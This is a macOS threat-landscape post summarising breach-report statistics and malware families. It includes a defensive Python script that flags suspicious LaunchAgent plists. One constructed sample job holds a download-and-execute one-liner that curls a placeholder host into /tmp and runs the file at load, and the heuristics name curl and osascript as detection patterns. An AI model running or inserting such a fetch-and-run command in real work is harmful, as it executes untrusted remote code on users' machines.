2025-11-27

Big-Picture MacOS Threat Climate

Level: Tactical | Source: Global

The notion that Macs are impervious to malware is eroding, though it has long stemmed from Apple's tight control over its ecosystem, built-in protections like XProtect and Gatekeeper, and a smaller overall market share. Reading the DBIR 2024 and M-Trends 2025 together, a few macro truths shape how we approach macOS:

  • Exploits + Identity are the meta
    • Exploits are now the #1 initial infection vector in M-Trends (33%), with stolen credentials in second place (16%).
    • DBIR shows exploitation of vulnerabilities up 180% YoY as an initial way in, tightly coupled to ransomware/extortion.
  • macOS families are evolving, not just existing
    • Families like OceanLotus, Bundlore, ATOMIC, AdaptixC2, WeaselStore, and DPRK toolkits (TsunamiKit, AkdoorTea, Tropidoor) are:
      • Multi-platform.
      • Rapidly refactoring to evade XProtect.
    • M-Trends shows Linux- and macOS-capable families increasing, even as Windows remains dominant.
  • Humans are still the weakest "API"
    • DBIR's "human element" is present in 68% of breaches (phishing, pretexting, misdelivery, user error), even after stripping out malicious insiders.
    • Social engineering and user-assisted execution are core to the macOS campaigns in the latest 8 reports we analyzed.

So for macOS: we’re not in a separate world, we’re seeing the same global patterns—exploits, stolen identities, social engineering, extortion—just implemented with AppleScript, LaunchAgents, /tmp binaries, npm scripts, and curl.
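The persistence plumbing named above (LaunchAgents that run shell one-liners, curl, AppleScript via osascript, or binaries dropped in /tmp) is cheap for a defender to audit. The script below is an added example for this post, not Anvilogic's tooling; its heuristics, names and the sample plists are constructed for illustration and are not a vetted detection rule.

```python
"""Audit launchd job plists for the macOS persistence patterns discussed above.

Heuristics (assumptions for this example, not an official rule):
  - a program argument that lives under /tmp (or /private/tmp, /var/tmp)
  - curl or osascript anywhere on the job's command line
  - a shell invoked with -c, i.e. a one-liner rather than a real binary
  - RunAtLoad set on a job that already tripped something else
"""
import plistlib
from pathlib import Path

SHELLS = {"sh", "bash", "zsh"}
TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")


def command_tokens(job: dict) -> list[str]:
    """Flatten Program/ProgramArguments into whitespace tokens.

    Splitting each argument means the payload inside `sh -c "curl ... | sh"`
    is inspected as well as the shell that wraps it.
    """
    args = [str(a) for a in job.get("ProgramArguments", [])]
    if not args and job.get("Program"):
        args = [str(job["Program"])]
    return [tok for arg in args for tok in arg.split()]


def audit_job(job: dict) -> list[str]:
    """Return the names of the heuristics a job trips (empty list = nothing noteworthy)."""
    toks = command_tokens(job)
    basenames = {Path(t).name for t in toks}
    findings = []
    if any(t.startswith(TMP_PREFIXES) for t in toks):
        findings.append("tmp_binary")
    if "curl" in basenames:
        findings.append("curl_in_launch_job")
    if "osascript" in basenames:
        findings.append("applescript_runner")
    if len(toks) >= 3 and Path(toks[0]).name in SHELLS and toks[1] == "-c":
        findings.append("shell_oneliner")
    if job.get("RunAtLoad") and findings:
        findings.append("run_at_load")
    return findings


def audit_plist_bytes(data: bytes) -> dict:
    """Parse one plist (XML or binary, plistlib handles both) and audit it."""
    job = plistlib.loads(data)
    return {
        "label": job.get("Label", "<no Label>"),
        "findings": audit_job(job),
    }


def audit_directory(directory) -> list[dict]:
    """Audit every *.plist in a directory; unparseable files are reported, not skipped."""
    results = []
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            result = audit_plist_bytes(path.read_bytes())
        except Exception as exc:  # malformed plist is itself worth a look
            result = {"label": path.name, "findings": [f"unparseable: {exc}"]}
        result["path"] = str(path)
        results.append(result)
    return results


# Constructed sample jobs (not real indicators): one benign, two resembling the patterns above.
BENIGN_JOB = {
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
    "StartInterval": 86400,
}
CURL_JOB = {
    "Label": "com.example.softwareupdate.helper",
    "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://placeholder.invalid/stage2 -o /tmp/.s && /tmp/.s"],
    "RunAtLoad": True,
}
APPLESCRIPT_JOB = {
    "Label": "com.example.notifier",
    "ProgramArguments": ["/usr/bin/osascript", "/tmp/.n.scpt"],
}

if __name__ == "__main__":
    for job in (BENIGN_JOB, CURL_JOB, APPLESCRIPT_JOB):
        print(job["Label"], audit_job(job))
    for report in audit_directory(Path.home() / "Library" / "LaunchAgents"):
        if report["findings"]:
            print(report)
```

Run it as-is to see the three constructed samples scored, then point `audit_directory` at `/Library/LaunchAgents` and `/Library/LaunchDaemons` as well as the per-user directory; a hit is a prompt to read the plist, not a verdict.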
